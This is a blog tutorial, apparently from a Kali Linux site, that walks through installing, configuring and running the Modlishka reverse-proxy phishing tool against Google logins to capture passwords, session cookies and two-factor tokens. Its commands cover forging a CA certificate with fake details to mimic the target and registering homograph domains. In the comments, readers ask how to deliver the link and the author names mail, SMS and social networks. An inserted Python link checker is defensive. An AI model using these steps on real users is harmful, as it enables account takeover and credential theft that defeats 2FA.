Modlishka -- Advanced Phishing | Bypass Two Factor Authentication

We all try to secure our online accounts and social media accounts by turning on Two-Factor Authentication or Two-Step Verification, and then we think that we are safe. Sometimes we test a suspected phishing page by entering a wrong password. But Modlishka can bypass two-factor authentication (2FA).

What is Modlishka?


Modlishka is an automated reverse-proxy phishing tool written in Go. It is called the most powerful and ferocious phishing tool ever created. This tool can perform advanced phishing. Modlishka can easily bypass two-factor authentication on Gmail, Yahoo Mail, Rediffmail, Facebook etc. and capture credentials such as the username, password and two-factor authentication token.



The best thing about Modlishka is that it doesn't require any saved phishing pages or templates. It uses a reverse proxy to serve the live website.

How Does Modlishka Work?


Modlishka combines social engineering with a MITM (man-in-the-middle) technique. The Modlishka server sits between the target website and the victim and acts as a proxy for the victim. All requests between the victim and the target website pass through the Modlishka server.



That's why Modlishka can easily grab the username and password entered by the user, as well as the authentication token. It can also capture the session and cookies between the user and the website, and an attacker can use them to establish a web session.
In this process the user will not realize even for a moment that the account was stolen. That's why Modlishka is a very dangerous tool.

Modlishka is very easy to set up, which makes this tool more dangerous. To be safe from it we need to check very carefully the link we are clicking. The phishing site will also use a third-party SSL certificate: suppose someone sends a phishing link for Gmail using Modlishka, then this phishing site will not have Google's SSL certificate.
Be aware and try not to click on any links.
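
The link check described above can be automated. The following Python code is an added example, not part of the original post or of Modlishka: it accepts a URL only if its host is the expected domain or a subdomain of it, and it decodes punycode labels so that homograph look-alikes are rejected. The function names and the sample URLs (apart from the loopback.modlishka.io host used later in this post) are constructed for illustration, and the certificate itself is not inspected.

```python
from urllib.parse import urlsplit


def decode_labels(host):
    """Split a hostname into labels, decoding punycode (xn--) labels to Unicode."""
    labels = []
    for label in host.split("."):
        if label.startswith("xn--"):
            label = label[4:].encode("ascii").decode("punycode")
        labels.append(label)
    return labels


def check_login_url(url, expected_domain):
    """Return (ok, reason): is this URL really served from expected_domain?"""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").rstrip(".")
    except ValueError:
        return False, "malformed URL"
    if parts.scheme != "https" or not host:
        return False, "not an https URL with a hostname"
    try:
        labels = decode_labels(host)
    except UnicodeError:
        return False, "malformed punycode label"
    if not all(label.isascii() for label in labels):
        return False, "non-ASCII label, possible homograph of " + expected_domain
    # Match on a label boundary; a substring test would accept look-alike hosts.
    if host == expected_domain or host.endswith("." + expected_domain):
        return True, "host is inside " + expected_domain
    return False, "host is outside " + expected_domain


# Constructed sample links, all claiming to be a Google login page.
SAMPLES = [
    "https://accounts.google.com/signin",
    "https://www.loopback.modlishka.io/",        # proxy host used in this post
    "https://accounts.google.com.example.net/",  # expected name as a prefix only
    "https://xn--" + "g\u043e\u043egle".encode("punycode").decode("ascii") + ".com/",
    "http://accounts.google.com/",
]

if __name__ == "__main__":
    for link in SAMPLES:
        print(link, "->", check_login_url(link, "google.com"))
```

Only the first sample passes; the proxy host, the prefix look-alike, the punycode homograph and the plain-http link are all rejected with a reason.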

How to Set up Modlishka in Kali Linux


This tool is written in Golang, so we need to install Golang on our Kali Linux system. Run the following command in a terminal:


apt-get install golang



After installing Golang we need to set our GOPATH, just as we would set the path for Java. We do this with the following command:

export GOPATH=$HOME/go


Let's check whether our 'go' path is set under the root directory. To check this we type the following command:

echo $GOPATH

The output shows that our go directory is under the root directory. Yes, it's perfect.

After setting the path we need to download Modlishka from GitHub. To do this we use the following command:

go get -u github.com/drk1wi/Modlishka
Remember that we don't put https or www before the GitHub link. This command does not show download progress; it downloads the whole tool, so we need to wait some time.


Then we need to go to the downloaded folder by using the command:

cd root/go/src/github.com/drk1wi/Modlishka



Now we can compile Modlishka, but before compiling we generate the SSL certificate. Here we configure it for localhost, but we can also use our registered domain (a homograph will be better) and its SSL certificate here.

First of all we generate an RSA private key with the following command:

openssl genrsa -out MyCA.key 2048
We can use any name for the key file.



Next we generate the SSL certificate. The command is as follows:

openssl req -x509 -new -nodes -key MyCA.key -sha256 -days 1024 -out MyCA.pem


In the information fields we can use any fake information. Fill it in so that it looks like the target domain's SSL information.

Now we can check our SSL certificate and key using the ls command:

ls
The output should list the key file (MyCA.key) and the certificate (MyCA.pem).


Now we open the key file in leafpad using the following command:

leafpad MyCA.key
Then we copy the whole text and close the file; we use Ctrl+A to select all and Ctrl+C to copy.

After copying the key we need to paste it into the autocert.go file in the plugin directory. Open it with the leafpad text editor using the following command:

leafpad plugin/autocert.go



Paste the key in place of PASTE_YOUR_CA_CERT_KEY_HERE. Remember that the key must stay inside the ' ' quotes.


Save and close it; next we copy and paste our SSL certificate. Use the following command to open the certificate for copying:

leafpad MyCA.pem

We copy the whole thing and paste it into the autocert.go file. Let's open the file again in the leafpad text editor with the following command:

leafpad plugin/autocert.go
Then paste it in place of PASTE_YOUR_CA_CERT_HERE. Save and close the autocert.go file.

Now everything is set up, and we compile Modlishka with the following command:

make

Now we can check the options by running the command:

./dist/proxy -h

Then we configure a target website for phishing. By default Modlishka uses Google's domain as the target. Use the following command to change the target domain:

nano templates/google.com_gsuite.json

Before running Modlishka we need to import our custom SSL certificate into our browser. If we use a registered domain we don't need to do this, because in that case we use an original SSL certificate.

So open the Firefox web browser and go to

Preferences > Advanced > Certificates > View Certificates > Import



Then select the MyCA.pem file in the directory root/go/src/github.com/drk1wi/Modlishka



Now we are all set to start the Modlishka server. We did not change the configuration file, so we start it using the following command:

./dist/proxy -config templates/google.com_gsuite.json

The tool then starts on our localhost.

Modlishka is now started. In the Firefox browser we go to https://www.loopback.modlishka.io, and this opens Google.com in live mode.



Now go to the login page and try to log in with a fake password or two-factor authentication.


This is a great tool, isn't it? Write your thoughts in the comment section. Thanks for reading this.
Reviewed by Kali Linux on April 15, 2019. Rating: 5

11 comments:

  1. Nice post, it helps me a lot, keep it up!!

  2. Wow....really working tutorial

  3. Yeah.. it's a great tool.. thanks for this info

  4. How do I do the configuration to send the link to the end user?

    What would be the link to send?

    Replies
    1. Thank you for your valuable comment. If you are using WAN with a registered domain and SSL certificates, you can send the link in any form, such as mail or SMS or social networks. I have discussed some good techniques at the end of this post. Read it all. (Sorry, I don't know Spanish, I wrote this with the help of Google Translate.)

  5. Please explain what the link to send by mail would be?

    Replies
    1. Thank you for your valuable comment, master. In this tutorial I used a LAN connection, which means that it only works for those who are connected to our network. How to send the link? Oh, simply SMS.
